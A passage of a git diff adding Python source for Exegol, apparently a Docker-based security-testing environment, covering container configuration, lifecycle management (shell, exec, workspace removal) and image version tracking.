KeyError: + # When the Key is not present in the dictionary + return False + + def addRawEnv(self, env: str): + """Parse and add an environment variable from raw user input""" + env_args = env.split('=') + if len(env_args) < 2: + logger.critical(f"Incorrect env syntax ({env}). Please use this format: KEY=value") + key = env_args[0] + value = '='.join(env_args[1:]) + logger.debug(f"Adding env {key}={value}") + self.addEnv(key, value) + + def getEnvs(self) -> Dict[str, str]: + """Envs config getter""" + return self.__envs + + def getShellEnvs(self) -> List[str]: + """Overriding envs when opening a shell""" + result = [] + if self.__enable_gui: + current_display = GuiUtils.getDisplayEnv() + # If the default DISPLAY environment in the container is not the same as the DISPLAY of the user's session, + # the environment variable will be updated in the exegol shell. + if current_display and self.__envs.get('DISPLAY', '') != current_display: + # This case can happen when the container is created from a local desktop + # but exegol can be launched from remote access via ssh with X11 forwarding + # (Be careful, an .Xauthority file may be needed). + result.append(f"DISPLAY={current_display}") + # TODO PATH common volume bin folder + # Overwrite env from user parameters + user_envs = ParametersManager().envs + if user_envs is not None: + for env in user_envs: + if len(env.split('=')) < 2: + logger.critical(f"Incorrect env syntax ({env}). Please use this format: KEY=value") + logger.debug(f"Add env to current shell: {env}") + result.append(env) + return result + + def getVpnName(self): + """Get VPN Config name""" + if self.__vpn_path is None: + return "[bright_black]N/A[/bright_black] " + return f"[deep_sky_blue3]{self.__vpn_path.name}[/deep_sky_blue3]" + + def addPort(self, + port_host: Union[int, str], + port_container: Union[int, str], + protocol: str = 'tcp', + host_ip: str = '0.0.0.0'): + """Add port NAT config, only applicable on bridge network mode.""" + if self.__network_host: + logger.warning( + "This container is configured to share the network with the host. You cannot open specific ports. Skipping.") + logger.warning("Please set network mode to bridge in order to expose specific network ports.") + return + if protocol.lower() not in ['tcp', 'udp', 'sctp']: + raise ProtocolNotSupported(f"Unknown protocol '{protocol}'") + self.__ports[f"{port_container}/{protocol}"] = (host_ip, int(port_host)) + + def getPorts(self) -> Dict[str, Optional[Union[int, Tuple[str, int], List[int]]]]: + """Ports config getter""" + return self.__ports + + def getTextFeatures(self, verbose: bool = False) -> str: + """Text formatter for features configurations (Privileged, GUI, Network, Timezone, Shares) + Print config only if they are different from their default config (or print everything in verbose mode)""" + result = "" + if verbose or self.__privileged: + result += f"{getColor(not self.__privileged)[0]}Privileged: {'On :fire:' if self.__privileged else '[green]Off :heavy_check_mark:[/green]'}{getColor(not self.__privileged)[1]}{os.linesep}" + if verbose or not self.__enable_gui: + result += f"{getColor(self.__enable_gui)[0]}GUI: {boolFormatter(self.__enable_gui)}{getColor(self.__enable_gui)[1]}{os.linesep}" + if verbose or not self.__network_host: + result += f"[green]Network mode: [/green]{'host' if self.__network_host else 'custom'}{os.linesep}" + if self.__vpn_path is not None: + result += f"[green]VPN: [/green]{self.getVpnName()}{os.linesep}" + if verbose or not self.__share_timezone: + result += f"{getColor(self.__share_timezone)[0]}Share timezone: {boolFormatter(self.__share_timezone)}{getColor(self.__share_timezone)[1]}{os.linesep}" + if verbose or not self.__exegol_resources: + result += f"{getColor(self.__exegol_resources)[0]}Exegol resources: {boolFormatter(self.__exegol_resources)}{getColor(self.__exegol_resources)[1]}{os.linesep}" + if verbose or not self.__shared_resources: + result += f"{getColor(self.__shared_resources)[0]}My resources: {boolFormatter(self.__shared_resources)}{getColor(self.__shared_resources)[1]}{os.linesep}" + return result.strip() + + def getTextMounts(self, verbose: bool = False) -> str: + """Text formatter for Mounts configurations. The verbose mode does not exclude technical volumes.""" + result = '' + for mount in self.__mounts: + # Blacklist technical mount + if not verbose and mount.get('Target') in ['/tmp/.X11-unix', '/opt/resources', '/etc/localtime', + '/etc/timezone', '/my-resources']: + continue + result += f"{mount.get('Source')} :right_arrow: {mount.get('Target')} {'(RO)' if mount.get('ReadOnly') else ''}{os.linesep}" + return result + + def getTextDevices(self, verbose: bool = False) -> str: + """Text formatter for Devices configuration. The verbose mode show full device configuration.""" + result = '' + for device in self.__devices: + if verbose: + result += f"{device}{os.linesep}" + else: + src, dest = device.split(':')[:2] + if src == dest: + result += f"{src}{os.linesep}" + else: + result += f"{src}:right_arrow:{dest}{os.linesep}" + return result + + def getTextEnvs(self, verbose: bool = False) -> str: + """Text formatter for Envs configuration. The verbose mode does not exclude technical variables.""" + result = '' + for k, v in self.__envs.items(): + # Blacklist technical variables, only shown in verbose + if not verbose and k in ["QT_X11_NO_MITSHM", "DISPLAY", "PATH"]: + continue + result += f"{k}={v}{os.linesep}" + return result + + def __str__(self): + """Default object text formatter, debug only""" + return f"Privileged: {self.__privileged}{os.linesep}" \ + f"Capabilities: {self.__capabilities}{os.linesep}" \ + f"Sysctls: {self.__sysctls}{os.linesep}" \ + f"X: {self.__enable_gui}{os.linesep}" \ + f"TTY: {self.tty}{os.linesep}" \ + f"Network host: {'host' if self.__network_host else 'custom'}{os.linesep}" \ + f"Share timezone: {self.__share_timezone}{os.linesep}" \ + f"Common resources: {self.__shared_resources}{os.linesep}" \ + f"Env ({len(self.__envs)}): {self.__envs}{os.linesep}" \ + f"Shares ({len(self.__mounts)}): {self.__mounts}{os.linesep}" \ + f"Devices ({len(self.__devices)}): {self.__devices}{os.linesep}" \ + f"VPN: {self.getVpnName()}" + + def printConfig(self): + """Log current object state, debug only""" + logger.info(f"Current container config :{os.linesep}{self}") diff --git a/exegol/model/ExegolContainer.py b/exegol/model/ExegolContainer.py new file mode 100644 index 00000000..58434084 --- /dev/null +++ b/exegol/model/ExegolContainer.py @@ -0,0 +1,226 @@ +import base64 +import os +import shutil +from typing import Optional, Dict, Sequence + +from docker.errors import NotFound +from docker.models.containers import Container + +from exegol.console.ExegolPrompt import Confirm +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.model.ContainerConfig import ContainerConfig +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, console + + +class ExegolContainer(ExegolContainerTemplate, SelectableInterface): + """Class of an exegol container already create in docker""" + + def __init__(self, docker_container: Container, model: Optional[ExegolContainerTemplate] = None): + logger.debug(f"== Loading container : {docker_container.name}") + self.__container: Container = docker_container + self.__id: str = docker_container.id + self.__xhost_applied = False + if model is None: + # Create Exegol container from an existing docker container + super().__init__(docker_container.name, + config=ContainerConfig(docker_container), + image=ExegolImage(docker_image=docker_container.image)) + self.image.syncContainerData(docker_container) + self.__new_container = False + else: + # Create Exegol container from a newly created docker container with its object template. + super().__init__(docker_container.name, + config=ContainerConfig(docker_container), + # Rebuild config from docker object to update workspace path + image=model.image) + self.__new_container = True + self.image.syncStatus() + + def __str__(self): + """Default object text formatter, debug only""" + return f"{self.getRawStatus()} - {super().__str__()}" + + def __getState(self) -> Dict: + """Technical getter of the container status dict""" + self.__container.reload() + return self.__container.attrs.get("State", {}) + + def getRawStatus(self) -> str: + """Raw text getter of the container status""" + return self.__getState().get("Status", "unknown") + + def getTextStatus(self) -> str: + """Formatted text getter of the container status""" + status = self.getRawStatus().lower() + if status == "unknown": + return "Unknown" + elif status == "exited": + return "[red]Stopped" + elif status == "running": + return "[green]Running" + return status + + def isNew(self) -> bool: + """Check if the container has just been created or not""" + return self.__new_container + + def isRunning(self) -> bool: + """Check is the container is running. Return bool.""" + return self.getRawStatus() == "running" + + def getFullId(self) -> str: + """Container's id getter""" + return self.__id + + def getId(self) -> str: + """Container's short id getter""" + return self.__container.short_id + + def getKey(self) -> str: + """Universal unique key getter (from SelectableInterface)""" + return self.name + + def start(self): + """Start the docker container""" + if not self.isRunning(): + logger.info(f"Starting container {self.name}") + with console.status(f"Waiting to start {self.name}", spinner_style="blue"): + self.__container.start() + self.postStartSetup() + + def stop(self, timeout: int = 10): + """Stop the docker container""" + if self.isRunning(): + logger.info(f"Stopping container {self.name}") + with console.status(f"Waiting to stop ({timeout}s timeout)", spinner_style="blue"): + self.__container.stop(timeout=timeout) + + def spawnShell(self): + """Spawn a shell on the docker container""" + logger.info(f"Location of the exegol workspace on the host : {self.config.getHostWorkspacePath()}") + for device in self.config.getDevices(): + logger.info(f"Shared host device: {device.split(':')[0]}") + logger.success(f"Opening shell in Exegol '{self.name}'") + # In case of multi-user environment, xhost must be set before opening each session to be sure + self.__applyXhostACL() + # Using system command to attach the shell to the user terminal (stdin / stdout / stderr) + envs = self.config.getShellEnvs() + options = "" + if len(envs) > 0: + options += f" -e {' -e '.join(envs)}" + cmd = f"docker exec{options} -ti {self.getFullId()} {ParametersManager().shell}" + logger.debug(f"Opening shell with: {cmd}") + os.system(cmd) + # Docker SDK doesn't support (yet) stdin properly + # result = self.__container.exec_run(ParametersManager().shell, stdout=True, stderr=True, stdin=True, tty=True, + # environment=self.config.getShellEnvs()) + # logger.debug(result) + + def exec(self, command: Sequence[str], as_daemon: bool = True, quiet: bool = False): + """Execute a command / process on the docker container""" + if not self.isRunning(): + self.start() + if not quiet: + logger.info("Executing command on Exegol") + if logger.getEffectiveLevel() > logger.VERBOSE and not ParametersManager().daemon: + logger.info("Hint: use verbose mode to see command output (-v).") + cmd = self.formatShellCommand(command, quiet) + stream = self.__container.exec_run(cmd, detach=as_daemon, stream=not as_daemon) + if as_daemon and not quiet: + logger.success("Command successfully executed in background") + else: + try: + # stream[0] : exit code + # stream[1] : text stream + for log in stream[1]: + logger.raw(log.decode("utf-8")) + if not quiet: + logger.success("End of the command") + except KeyboardInterrupt: + if not quiet: + logger.info("Detaching process logging") + logger.warning("Exiting this command does NOT stop the process in the container") + + @staticmethod + def formatShellCommand(command: Sequence[str], quiet: bool = False): + """Generic method to format a shell command and support zsh aliases""" + # Using base64 to escape special characters + str_cmd = ' '.join(command) + if not quiet: + logger.success(f"Command received: {str_cmd}") + cmd_b64 = base64.b64encode(str_cmd.encode('utf-8')).decode('utf-8') + # Load zsh aliases and call eval to force aliases interpretation + cmd = f'zsh -c "source /opt/.zsh_aliases; eval $(echo {cmd_b64} | base64 -d)"' + logger.debug(f"Formatting zsh command: {cmd}") + return cmd + + def remove(self): + """Stop and remove the docker container""" + self.__removeVolume() + self.stop(timeout=2) + logger.info(f"Removing container {self.name}") + try: + self.__container.remove() + logger.success(f"Container {self.name} successfully removed.") + except NotFound: + logger.error( + f"The container {self.name} has already been removed (probably created as a temporary container).") + + def __removeVolume(self): + """Remove private workspace volume directory if exist""" + volume_path = self.config.getPrivateVolumePath() + # TODO add backup + if volume_path != '': + if volume_path.startswith('/wsl/') or volume_path.startswith('\\wsl\\'): + # Docker volume defines from WSL don't return the real path, they cannot be automatically removed + # TODO review WSL workspace volume + logger.warning("Warning: WSL workspace directory cannot be removed automatically.") + return + logger.verbose("Removing workspace volume") + logger.debug(f"Removing volume {volume_path}") + try: + is_file_present = os.listdir(volume_path) + except PermissionError: + if Confirm(f"Insufficient permission to view workspace files {volume_path}, " + f"do you still want to delete them?", default=False): + # Set is_file_present as false to skip user prompt again + is_file_present = False + else: + return + try: + if is_file_present: + # Directory is not empty + if not Confirm(f"Workspace [magenta]{volume_path}[/magenta] is not empty, do you want to delete it?", + default=False): + # User can choose not to delete the workspace on the host + return + # Try to remove files from the host with user permission (work only without sub-directory) + shutil.rmtree(volume_path) + except PermissionError: + logger.info(f"Deleting the workspace files from the [green]{self.name}[/green] container as root") + # If the host can't remove the container's file and folders, the rm command is exec from the container itself as root + self.exec(["rm", "-rf", "/workspace"], as_daemon=False, quiet=True) + try: + shutil.rmtree(volume_path) + except PermissionError: + logger.warning(f"I don't have the rights to remove [magenta]{volume_path}[/magenta] (do it yourself)") + return + except Exception as err: + logger.error(err) + return + logger.success("Private workspace volume removed successfully") + + def postStartSetup(self): + self.__applyXhostACL() + + def __applyXhostACL(self): + # If GUI is enabled, allow X11 access on host ACL (if not already allowed) + # + X11 GUI on Windows host don't need xhost command + if self.config.isGUIEnable() and not self.__xhost_applied and not EnvInfo.isWindowsHost(): + self.__xhost_applied = True # Can be applied only once per execution + logger.debug(f"Adding xhost ACL to local:{self.hostname}") + os.system(f"xhost +local:{self.hostname} > /dev/null") diff --git a/exegol/model/ExegolContainerTemplate.py b/exegol/model/ExegolContainerTemplate.py new file mode 100644 index 00000000..cdb72469 --- /dev/null +++ b/exegol/model/ExegolContainerTemplate.py @@ -0,0 +1,28 @@ +import os +from typing import Optional + +from rich.prompt import Prompt + +from exegol.model.ContainerConfig import ContainerConfig +from exegol.model.ExegolImage import ExegolImage + + +class ExegolContainerTemplate: + """Exegol template class used to create a new container""" + + def __init__(self, name: Optional[str], config: ContainerConfig, image: ExegolImage): + if name is None: + name = Prompt.ask("[bold blue][?][/bold blue] Enter the name of your new exegol container", default="default") + assert name is not None + self.name: str = name.replace('exegol-', '') + self.hostname: str = name if name.startswith("exegol-") else f'exegol-{name}' + self.image: ExegolImage = image + self.config: ContainerConfig = config + + def __str__(self): + """Default object text formatter, debug only""" + return f"{self.name} - {self.image.getName()}{os.linesep}{self.config}" + + def prepare(self): + """Prepare the model before creating the docker container""" + self.config.prepareShare(self.name) diff --git a/exegol/model/ExegolImage.py b/exegol/model/ExegolImage.py new file mode 100644 index 00000000..b896d4d6 --- /dev/null +++ b/exegol/model/ExegolImage.py @@ -0,0 +1,502 @@ +from datetime import datetime +from typing import Optional, List + +from docker.models.containers import Container +from docker.models.images import Image + +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.ExeLog import logger + + +class ExegolImage(SelectableInterface): + """Class of an exegol image. Container every information about the docker image.""" + + def __init__(self, + name: str = "NONAME", + digest: Optional[str] = None, + image_id: Optional[str] = None, + size: int = 0, + docker_image: Optional[Image] = None, + isUpToDate: bool = False): + """Docker image default value""" + # Init attributes + self.__image: Image = docker_image + self.__name: str = name + self.__alt_name: str = '' + self.__version_specific: bool = "-" in name + # Latest version available of the current image (or current version if version specific) + self.__profile_version: str = '-'.join(name.split('-')[1:]) if self.isVersionSpecific() else \ + "[bright_black]N/A[/bright_black]" + # Version of the docker image installed + self.__image_version: str = self.__profile_version + # This mode allows to know if the version has been retrieved from the tag and is part of the image name or + # if it is retrieved from the tags (ex: nightly) + self.__version_label_mode: bool = False + self.__build_date = "[bright_black]N/A[/bright_black]" + # Remote image size + self.__dl_size: str = "[bright_black]N/A[/bright_black]" if size == 0 else self.__processSize(size) + # Local uncompressed image's size + self.__disk_size: str = "[bright_black]N/A[/bright_black]" + # Remote image ID + self.__digest: str = "[bright_black]N/A[/bright_black]" + # Local docker image ID + self.__image_id: str = "[bright_black]Not installed[/bright_black]" + # Status + self.__is_remote: bool = size > 0 + self.__is_install: bool = False + self.__is_update: bool = isUpToDate + self.__is_discontinued: bool = False + # The latest version is merged with the latest one, every other version is old and must be removed + self.__outdated: bool = self.__version_specific + self.__custom_status: str = "" + # Process data + if docker_image is not None: + self.__initFromDockerImage() + else: + self.__setDigest(digest) + self.__setImageId(image_id) + logger.debug("└── {}\t→ ({}) {}".format(self.__name, self.getType(), self.__digest)) + + def __initFromDockerImage(self): + """Parse Docker object to set up self configuration on creation.""" + # If docker object exists, image is already installed + self.__is_install = True + # Set init values from docker object + if len(self.__image.attrs["RepoTags"]) > 0: + # Tag as outdated until the latest tag is found + self.__outdated = True + name = self.__name # Init with old name + self.__name = None + for repo_tag in self.__image.attrs["RepoTags"]: + repo, name = repo_tag.split(':') + if not repo.startswith(ConstantConfig.IMAGE_NAME): + # Ignoring external images (set container using external image as outdated) + continue + # Check if a non-version tag (the latest tag) is supplied, if so, this image must NOT be removed + if "-" not in name: + self.__outdated = False + self.__name = name + else: + self.__setImageVersion('-'.join(name.split('-')[1:])) + + # if no version has been found, restoring previous name + if self.__name is None: + self.__name = name + + self.__version_specific = "-" in self.__name + if self.isVersionSpecific(): + self.__profile_version = '-'.join(name.split('-')[1:]) + self.__setImageVersion(self.__profile_version) + else: + # If tag is , try to find labels value, if not set fallback to default value + self.__name = self.__image.labels.get("org.exegol.tag", "") + self.__outdated = True + self.__version_specific = True + self.__setRealSize(self.__image.attrs["Size"]) + # Set build date from labels + self.__build_date = self.__image.labels.get('org.exegol.build_date', '[bright_black]N/A[/bright_black]') + # Set local image ID + self.__setImageId(self.__image.attrs["Id"]) + # If this image is remote, set digest ID + self.__is_remote = len(self.__image.attrs["RepoDigests"]) > 0 + if self.__is_remote: + self.__setDigest(self.__parseDigest(self.__image)) + self.__labelVersionParsing() + # Default status, must be refreshed if some parameters are change externally + self.syncStatus() + + def __labelVersionParsing(self): + """Fallback version parsing using image's label (if exist). + This method can only be used if version has not been provided from the image's tag.""" + if "N/A" in self.__image_version: + version_label = self.__image.labels.get("org.exegol.version") + if version_label is not None: + self.__setImageVersion(version_label, source_tag=False) + + def syncStatus(self): + """When the image is loaded from a docker object, docker repository metadata are not present. + It's not (yet) possible to know if the current image is up-to-date.""" + if "N/A" in self.__profile_version and not self.isLocal() and not self.isUpToDate() and not self.__is_discontinued and not self.__outdated: + # TODO find if up-to-date (direct docker load) must check with repo (or DockerUtils cache / DockerHubUtils) + self.__custom_status = "[bright_black]Unknown[/bright_black]" + else: + self.__custom_status = "" + + def syncContainerData(self, container: Container): + """Synchronization between the container and the image. + If the image has been updated, the tag is lost, + but it is saved in the properties of the container that still uses it.""" + if self.isLocked(): + original_name = container.attrs["Config"]["Image"].split(":")[1] + if self.__name == 'NONAME': + self.__name = original_name + self.__version_specific = "-" in self.__name + self.__alt_name = f'{original_name} [bright_black](outdated' \ + f'{f" v.{self.getImageVersion()}" if "N/A" not in self.getImageVersion() else ""})[/bright_black]' + + def updateCheck(self) -> Optional[str]: + """If this image can be updated, return its name, otherwise return None""" + if self.__is_remote: + if self.__is_update: + logger.warning("This image is already up to date. Skipping.") + return None + return self.__name + else: + logger.error("Local images cannot be updated.") + return None + + def isUpToDate(self) -> bool: + if not self.__is_remote: + return True # Local image cannot be updated + return self.__is_update + + def removeCheck(self) -> Optional[str]: + """If this image can be removed, return its name, otherwise return None""" + if self.__is_install: + return self.__name + else: + logger.error("This image is not installed locally. Skipping.") + return None + + def setDockerObject(self, docker_image: Image): + """Docker object setter. Parse object to set up self configuration.""" + self.__image = docker_image + # When a docker image exist, image is locally installed + self.__is_install = True + # Set real size on disk + self.__setRealSize(self.__image.attrs["Size"]) + # Set local image ID + self.__setImageId(docker_image.attrs["Id"]) + # Set build date from labels + self.__build_date = self.__image.labels.get('org.exegol.build_date', '[bright_black]N/A[/bright_black]') + # Check if local image is sync with remote digest id (check up-to-date status) + self.__is_update = self.__digest == self.__parseDigest(docker_image) + # Add version tag (if available) + for repo_tag in docker_image.attrs["RepoTags"]: + tmp_name, tmp_tag = repo_tag.split(':') + if tmp_name == ConstantConfig.IMAGE_NAME and "-" in tmp_tag: + self.__setImageVersion('-'.join(tmp_tag.split('-')[1:])) + # backup plan: Use label to retrieve image version + self.__labelVersionParsing() + + @classmethod + def __mergeCommonImages(cls, images: List['ExegolImage']): + """Select latest images and merge them with their version's specific equivalent (installed and/or latest).""" + latest_images, version_images = [], [] + # Splitting images by type : latest or version specific + for img in images: + if '-' in img.getName(): + version_images.append(img) + else: + latest_images.append(img) + + # Test each combination + for main_image in latest_images: + for version_specific in version_images: + match = False + if main_image.getRemoteId() == version_specific.getRemoteId(): + # Set exact profile version to the remaining latest image + main_image.__setLatestVersion(version_specific.getImageVersion()) + match = True + # Try to find a matching version (If 2 local id images are the same, this version is actually installed as latest) + if main_image.isInstall() and main_image.getLocalId() == version_specific.getLocalId(): + # Set version to the remaining latest image + main_image.__setImageVersion(version_specific.getImageVersion()) + match = True + if match: + try: + # Remove duplicates image from the result array (don't need to be returned, same object) + images.remove(version_specific) + except ValueError: + # already been removed + pass + + @classmethod + def mergeImages(cls, remote_images: List['ExegolImage'], local_images: List[Image]) -> List['ExegolImage']: + """Compare and merge local images and remote images. + Use case to process : + - up-to-date : "Version specific" image can use exact digest_id matching. Latest image must match corresponding tag + - outdated : Don't match digest_id but match (latest) tag + - local image : don't have any 'RepoDigests' because they are local + - discontinued : image with 'RepoDigests' properties but not found in remote + - unknown : no internet connection = no information from the registry + - not install : other remote images without any match + Return a list of ExegolImage.""" + results = [] + # build data + local_data = {} + for local_img in local_images: + # Check if custom local build + if len(local_img.attrs["RepoDigests"]) == 0: + # This image is build locally + new_image = ExegolImage(docker_image=local_img) + results.append(new_image) + continue + # find digest id + digest = local_img.attrs["RepoDigests"][0].split('@')[1] + for digest_id in local_img.attrs["RepoDigests"]: + if digest_id.startswith(ConstantConfig.IMAGE_NAME): # Find digest id from the right repository + digest = digest_id.split('@')[1] + break + # Load variables - find current image tags + names: List[str] = [] + tags: List[str] = [] + # handle tag + if len(local_img.attrs["RepoTags"]) > 0: + for repo_tag in local_img.attrs["RepoTags"]: + tmp_name, tmp_tag = repo_tag.split(':') + # Selecting tags from the good repository + filtering out version tag (handle by digest_id earlier) + if tmp_name == ConstantConfig.IMAGE_NAME and "-" not in tmp_tag: + names.append(tmp_name) + tags.append(tmp_tag) + # Temporary data structure + local_data[digest] = {"tags": tags, "image": local_img, "match": False} + + for current_image in remote_images: + for digest, data in local_data.items(): + # Same digest id = up-to-date + if current_image.getRemoteId() == digest: + current_image.setDockerObject(data["image"]) # Handle up-to-date, version specific + data["match"] = True + if current_image.isVersionSpecific(): # If the image is latest, tag must be also check + break + # if latest mode, must match with tag (to find already installed outdated version) + for tag in data.get('tags', []): + # Check if the tag is matching and + if current_image.getName() == tag and not current_image.isUpToDate(): + current_image.setDockerObject( + data["image"]) # Handle latest image matching (up-to-date / outdated) + data["match"] = True + # If remote image don't find any match, fallback to default => not installed + + results.extend(remote_images) # Every remote images is kept (even if not installed) + + for data in local_data.values(): + if not data["match"]: + # Matching image not found - there is no match with remote image list + new_image = ExegolImage(docker_image=data["image"]) + if len(remote_images) == 0: + # If there are no remote images left, the user probably doesn't have internet and can't know the status of the images from the registry + new_image.setCustomStatus("[bright_black]Unknown[/bright_black]") + else: + # If there are still remote images but the image has not found any match it is because it has been deleted/discontinued + new_image.__is_discontinued = True + # Discontinued image can no longer be updated + new_image.__is_update = True + # Status must be updated after changing previous criteria + new_image.syncStatus() + results.append(new_image) + + cls.__mergeCommonImages(results) + return results + + @classmethod + def reorderImages(cls, images: List['ExegolImage']) -> List['ExegolImage']: + """Reorder ExegolImages depending on their status""" + uptodate, outdated, local_build, deprecated = [], [], [], [] + for img in images.copy(): + # First up-to-date + if img.isUpToDate(): + uptodate.append(img) # The current image if added to the corresponding groups + images.remove(img) # and is removed from the pool (last image without any match will be last) + # Second need upgrade + elif (not img.isLocal()) and img.isInstall(): + outdated.append(img) + images.remove(img) + # Third local + elif img.isLocal(): + local_build.append(img) + images.remove(img) + # Fourth deprecated + elif img.isLocked() and img.isInstall(): + deprecated.append(img) + images.remove(img) + # apply images order + result = uptodate + outdated + local_build + deprecated + # then not installed & other + result.extend(images) # Adding left images + return result + + @staticmethod + def __processSize(size: int, precision: int = 1) -> str: + """Text formatter from size number to human-readable size.""" + # https://stackoverflow.com/a/32009595 + suffixes = ["B", "KB", "MB", "GB", "TB"] + suffix_index = 0 + calc: float = size + while calc > 1024 and suffix_index < 4: + suffix_index += 1 # increment the index of the suffix + calc = calc / 1024 # apply the division + return "%.*f%s" % (precision, calc, suffixes[suffix_index]) + + def __eq__(self, other): + """Operation == overloading for ExegolImage object""" + # How to compare two ExegolImage + if type(other) is ExegolImage: + return self.__name == other.__name and self.__digest == other.__digest + # How to compare ExegolImage with str + elif type(other) is str: + return self.__name == other + else: + logger.error(f"Error, {type(other)} compare to ExegolImage is not implemented") + raise NotImplementedError + + def __str__(self): + """Default object text formatter, debug only""" + return f"{self.__name} ({self.__image_version}/{self.__profile_version}) - {self.__disk_size} - " + \ + (f"({self.getStatus()}, {self.__dl_size})" if self.__is_remote else f"{self.getStatus()}") + + def setCustomStatus(self, status: str): + """Manual image's status overwrite""" + self.__custom_status = status + + def getStatus(self, include_version: bool = True) -> str: + """Formatted text getter of image's status. + Parameter include_version allow choosing if the image version must be printed or not. + When image version is already print in the user context, no need to duplicate the information. + The status update available always print his version because the latest version is not print elsewhere.""" + image_version = '' if (not include_version) or 'N/A' in self.getImageVersion() else f' (v.{self.getImageVersion()})' + if self.__custom_status != "": + return self.__custom_status + elif not self.__is_remote: + return "[blue]Local image[/blue]" + elif self.__outdated and self.__is_install: + return f"[orange3]Outdated{image_version}[/orange3]" + elif self.__is_discontinued: + return "[red]Discontinued[/red]" + elif self.__is_update: + return f"[green]Up to date{image_version}[/green]" + elif self.__is_install: + return f"[orange3]Update available" \ + f"{'' if 'N/A' in self.getLatestVersion() else f' (v.{self.getImageVersion()} :arrow_right: v.{self.getLatestVersion()})'}[/orange3]" + else: + return "[bright_black]Not installed[/bright_black]" + + def getType(self) -> str: + """Image type getter""" + return "remote" if self.__is_remote else "local" + + def __setDigest(self, digest: Optional[str]): + """Remote image digest setter""" + if digest is not None: + self.__digest = digest + + @staticmethod + def __parseDigest(docker_image: Image) -> str: + """Parse the remote image digest ID. + Return digest id from the docker object.""" + for digest_id in docker_image.attrs["RepoDigests"]: + if digest_id.startswith(ConstantConfig.IMAGE_NAME): # Find digest id from the right repository + return digest_id.split('@')[1] + return "" + + def getRemoteId(self) -> str: + """Remote digest getter""" + return self.__digest + + def __setImageId(self, image_id: Optional[str]): + """Local image id setter""" + if image_id is not None: + self.__image_id = image_id.split(":")[1][:12] + + def getLocalId(self) -> str: + """Local id getter""" + return self.__image_id + + def getKey(self) -> str: + """Universal unique key getter (from SelectableInterface)""" + return self.getName() + + def __setRealSize(self, value: int): + """On-Disk image size setter""" + self.__disk_size = self.__processSize(value) + + def getRealSize(self) -> str: + """On-Disk size getter""" + return self.__disk_size + + def getDownloadSize(self) -> str: + """Remote size getter""" + if not self.__is_remote: + return "local" + return self.__dl_size + + def getSize(self) -> str: + """Image size getter. If the image is installed, return the on-disk size, otherwise return the remote size""" + return self.__disk_size if self.__is_install else f"{self.__dl_size} [bright_black](compressed)[/bright_black]" + + def getBuildDate(self): + """Build date getter""" + if "N/A" not in self.__build_date: + return datetime.strptime(self.__build_date, "%Y-%m-%dT%H:%M:%SZ").strftime("%d/%m/%Y %H:%M") + else: + return self.__build_date + + def isInstall(self) -> bool: + """Installation status getter""" + return self.__is_install + + def isLocal(self) -> bool: + """Local type getter""" + return not self.__is_remote + + def isLocked(self) -> bool: + """Getter locked status. + If current image is locked, it must be removed""" + return self.__outdated + + def isVersionSpecific(self) -> bool: + """Is the current image a version specific version? + Image version specific container a '-' in the name, + latest image don't.""" + return self.__version_specific + + def getName(self) -> str: + """Image's tag name getter""" + return self.__name + + def getDisplayName(self) -> str: + """Image's display name getter""" + return self.__alt_name if self.__alt_name else self.__name + + def getLatestVersionName(self) -> str: + """Image's tag name with latest version getter""" + if self.__version_specific or self.__version_label_mode or 'N/A' in self.__profile_version: + return self.__name + else: + return self.__name + "-" + self.__profile_version + + def getInstalledVersionName(self) -> str: + """Image's tag name with latest version getter""" + if self.__version_specific or self.__version_label_mode or 'N/A' in self.__image_version: + return self.__name + else: + return self.__name + "-" + self.__image_version + + def __setImageVersion(self, version: str, source_tag: bool = True): + """Image's tag version setter. + Set source_tag as true if the information is retrieve from the image's tag name. + If the version is retrieve from the label, set source_tag as False.""" + self.__image_version = version + self.__version_label_mode = not source_tag + + def getImageVersion(self) -> str: + """Image's tag version getter""" + return self.__image_version + + def __setLatestVersion(self, version: str): + """Image's tag version setter""" + self.__profile_version = version + + def getLatestVersion(self) -> str: + """Latest image version getter""" + return self.__profile_version + + def getFullName(self) -> str: + """Dockerhub image's full name getter""" + return f"{ConstantConfig.IMAGE_NAME}:{self.__name}" + + def getFullVersionName(self) -> str: + """Dockerhub image's full (installed) version name getter""" + return f"{ConstantConfig.IMAGE_NAME}:{self.getInstalledVersionName()}" diff --git a/exegol/model/ExegolModules.py b/exegol/model/ExegolModules.py new file mode 100644 index 00000000..2272f5a5 --- /dev/null +++ b/exegol/model/ExegolModules.py @@ -0,0 +1,86 @@ +from pathlib import Path +from typing import Optional, Union + +from exegol.console.ExegolPrompt import Confirm +from exegol.exceptions.ExegolExceptions import CancelOperation +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.ExeLog import logger +from exegol.utils.GitUtils import GitUtils +from exegol.utils.MetaSingleton import MetaSingleton +from exegol.utils.UserConfig import UserConfig + + +class ExegolModules(metaclass=MetaSingleton): + """Singleton class dedicated to the centralized management of the project modules""" + + def __init__(self): + """Init project git modules to None until their first call""" + self.__git_wrapper: Optional[GitUtils] = None + self.__git_source: Optional[GitUtils] = None + self.__git_resources: Optional[GitUtils] = None + + def getWrapperGit(self, fast_load: bool = False) -> GitUtils: + """GitUtils local singleton getter. + Set fast_load to True to disable submodule init/update.""" + if self.__git_wrapper is None: + self.__git_wrapper = GitUtils(skip_submodule_update=fast_load) + return self.__git_wrapper + + def getSourceGit(self, fast_load: bool = False) -> GitUtils: + """GitUtils source submodule singleton getter. + Set fast_load to True to disable submodule init/update.""" + # Be sure that submodules are init first + self.getWrapperGit() + if self.__git_source is None: + self.__git_source = GitUtils(ConstantConfig.src_root_path_obj / "exegol-docker-build", "images", + skip_submodule_update=fast_load) + return self.__git_source + + def getResourcesGit(self, fast_load: bool = False, skip_install: bool = False) -> GitUtils: + """GitUtils resource repo/submodule singleton getter. + Set fast_load to True to disable submodule init/update. + Set skip_install to skip to installation process of the modules if not available. + if skip_install is NOT set, the CancelOperation exception is raised if the installation failed.""" + if self.__git_resources is None: + self.__git_resources = GitUtils(UserConfig().exegol_resources_path, "resources", "", + skip_submodule_update=fast_load) + if not self.__git_resources.isAvailable and not skip_install: + self.__init_resources_repo() + return self.__git_resources + + def __init_resources_repo(self): + """Initialization procedure of exegol resources module. + Raise CancelOperation if the initialization failed.""" + if Confirm("Do you want to download exegol resources? 